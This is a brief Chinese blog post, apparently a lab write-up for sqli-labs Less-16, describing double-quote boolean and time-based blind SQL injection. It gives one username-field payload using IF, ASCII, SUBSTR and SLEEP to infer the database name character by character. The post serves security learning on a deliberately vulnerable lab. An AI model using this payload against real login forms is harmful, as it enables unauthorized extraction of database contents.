sqli-labs:Less-16

Less-16实验主要是:双引号boolen/时间盲注

这个实验过程和Less-15基本是一样的,只是用的是双引号。这里就不过多介绍了,利用代码为在username输入:
admin") and If(ascii(substr(database(),1,1))=115,1,sleep(5))#
密码随便输入。

posted @ 2020-04-08 14:19  tangjf10  阅读(158)  评论(0)    收藏  举报